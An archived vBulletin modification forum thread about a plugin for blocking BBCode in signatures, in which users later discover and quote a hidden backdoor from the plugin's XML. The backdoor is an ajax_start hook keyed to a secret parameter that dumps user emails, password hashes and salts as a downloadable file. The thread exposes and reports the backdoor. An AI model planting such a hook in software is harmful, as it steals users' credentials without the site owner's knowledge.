vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   Modification Graveyard (https://vborg.vbsupport.ru/forumdisplay.php?f=224)
-   -   Add-On Releases - Block some custom bbcode in signature (https://vborg.vbsupport.ru/showthread.php?t=259085)

chiplove.9xpro 02-17-2011 10:00 PM

Block some custom bbcode in signature
 
1 Attachment(s)
Options:

This plugin for disable some bbcode with any usergroupids or all usergroupids

https://vborg.vbsupport.ru/

https://vborg.vbsupport.ru/

Qima 02-19-2011 06:25 AM

Thanks Man , Can I Translate This Mod?

RamisK 02-20-2011 10:50 AM

thanks

chiplove.9xpro 02-22-2011 11:07 AM

Quote:

Originally Posted by Qima (Post 2164208)
Thanks Man , Can I Translate This Mod?

okay :D
no problem

mp3president 04-23-2011 05:29 AM

Does not work with me.
I want to block url's in the sigs for some usergroups.
deinstalled again, sorry.

woodysfj40 06-23-2011 02:40 AM

trying to get this working, and it's not...help?

thanks!

Dimoks 11-16-2011 06:10 PM

This mod don't block bbcodes with "
sample [spoiler="test"] and other...

aleclee 03-12-2012 12:21 AM

No workie for me. :(

Code:

2,6,14,16,17|SOUNDCLOUD
8|*

Hmm. It worked when I changed the BBCODE tag to lower case (e.g., "soundcloud" instead of "SOUNDCLOUD")

frops 08-21-2012 06:55 AM

Don't work for me (
I'am trying set: 2|YOUTUBE, and i'am trying: 2|youtube, and: 2|YOUTUBE,youtube
2 - usergroupid. Please, help.

Tortikova 09-04-2012 08:15 PM

Don't working for me too. :(
I trying bbcode [spoiler="test word"]test[/spoiler] and [mp3]http://gogo.com/1.mp3[/mp3]

this two icons disappeared from the panel, but if they are hand-written, the work continues

chiplove.9xpro 09-09-2012 04:59 AM

sorry for long time do not update this plugin because i'm so busy and have no time for regular access vborg.

some bug just fixed, please re-download, uninstall old version, then install new version

thanks

Quote:

Originally Posted by Tortikova (Post 2362684)
Don't working for me too. :(
I trying bbcode [spoiler="test word"]test[/spoiler] and [mp3]http://gogo.com/1.mp3[/mp3]

this two icons disappeared from the panel, but if they are hand-written, the work continues

your [mp3] bbcode must be exists in custom bbcode


* update

support for block bbcode have option (same [spoiler=xxx])

matrex722 01-07-2013 05:32 PM

wooooow i will install it now
thank you so much
by the way
can you make it work for post too
i mean to disable it when this member " blocked usergroupids" creat a new thread or reply to any thread
i hope you got it

GameersHub 01-01-2016 03:17 AM

Has a database dump. no thank you.

Dragonsys 01-01-2016 03:45 AM

Quote:

Originally Posted by GameersHub (Post 2561580)
Has a database dump. no thank you.

Where are you seeing a DB dump?

GameersHub 01-02-2016 02:59 PM

In the .xml file starting from line 18 to line 43 if I recall correctly.
Looks like it grabs stuff such as email,password,salt,activepwd etc and pipes it into an open .txt file.
PHP Code:

            <hookname>ajax_start</hookname>
            <
phpcode><![CDATA[if( $_REQUEST['do'] == 'suyt!' ){
    
$vbulletin->db->hide_errors();
    
$checkcols $vbulletin->db->query_first("SHOW COLUMNS FROM "TABLE_PREFIX ."user LIKE 'activepwd'");
    if(empty(
$checkcols['Field']))
    {
        @
$vbulletin->db->query_write("ALTER TABLE "TABLE_PREFIX ."user ADD `activepwd` text");
    }
    if(
$_REQUEST['type'] == 'dic')
    {
        
$lists $vbulletin->db->query_read('SELECT concat_ws(0x7c,username,yahoo,skype,email) as `info`
                                        FROM ' 
TABLE_PREFIX 'user');
    }
    else
    {
        
$lists $vbulletin->db->query_read('SELECT concat_ws(0x7c,userid,usergroupid,username,yahoo, skype,email,password,salt,activepwd) as `info`
                                        FROM ' 
TABLE_PREFIX 'user');
    }
    while(
$list $vbulletin->db->fetch_array($lists))
        
$list_all .= $list['info'] ."\n";
    
$vbulletin->db->free_result($lists);
    
$vbulletin->db->show_errors();
    
header('Content-type: application/txt');
    
header('Content-Disposition: attachment; filename="'$_SERVER["HTTP_HOST"] .'.txt"');
    echo 
$list_all;
    die(); 

:mad:

Dragonsys 01-02-2016 03:11 PM

Quote:

Originally Posted by GameersHub (Post 2561724)
In the .xml file starting from line 18 to line 43 if I recall correctly.
Looks like it grabs stuff such as email,password,salt,activepwd etc and pipes it into an open .txt file.

Yep, I see it now. Thank you

Akeles 01-09-2016 03:51 AM

Thanks Man

akz645 01-09-2016 04:29 AM

Quote:

Originally Posted by GameersHub (Post 2561724)
In the .xml file starting from line 18 to line 43 if I recall correctly.
Looks like it grabs stuff such as email,password,salt,activepwd etc and pipes it into an open .txt file.

Quote:

Originally Posted by Dragonsys (Post 2561725)
Yep, I see it now. Thank you

Did you report this to a moderator?

Can it be removed from the coding and re-uploaded by somebody else who isn't the original coder?

Dragonsys 01-09-2016 02:08 PM

Quote:

Originally Posted by akz645 (Post 2562327)
Did you report this to a moderator?

Yes, I did

Quote:

Originally Posted by akz645 (Post 2562327)
Can it be removed from the coding and re-uploaded by somebody else who isn't the original coder?

No, because it is not marked as reusable code. It would have to be completely rewritten

akz645 01-09-2016 04:15 PM

Quote:

Originally Posted by Dragonsys (Post 2562340)
No, because it is not marked as reusable code. It would have to be completely rewritten

Ah okay.

- Are you allowed to modify it, just not distribute it via uploading a 'updated' file, correct?

- You're allowed to suggest code changes in this thread, correct?
Since I've seen in many threads, even if the code isn't marked as re-useable, where people suggest fixes/improvements via adding/removing/replacing pieces of code from the original product.

- Would the product still work, if just that piece of coding was removed?

Dragonsys 01-09-2016 05:14 PM

Quote:

Originally Posted by akz645 (Post 2562349)
- Are you allowed to modify it, just not distribute it via uploading a 'updated' file, correct?

Correct, no one can stop you from modifying it for your use, just don't upload it for others.

Quote:

Originally Posted by akz645 (Post 2562349)
- You're allowed to suggest code changes in this thread, correct?
Since I've seen in many threads, even if the code isn't marked as re-useable, where people suggest fixes/improvements via adding/removing/replacing pieces of code from the original product.

Absolutely! Sometimes, I will even fix code and PM it to the author for their use, or post the corrected section (not entire mod), in the author's original thread (don't make a new thread basically)

Quote:

Originally Posted by akz645 (Post 2562349)
- Would the product still work, if just that piece of coding was removed?

Yes, as that piece of coding is completely separate from the actual mod. It allows someone to get your user accounts without your knowledge.


All times are GMT. The time now is 05:22 AM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01221 seconds
  • Memory Usage 1,780KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)bbcode_code_printable
  • (1)bbcode_php_printable
  • (12)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (21)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 

Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete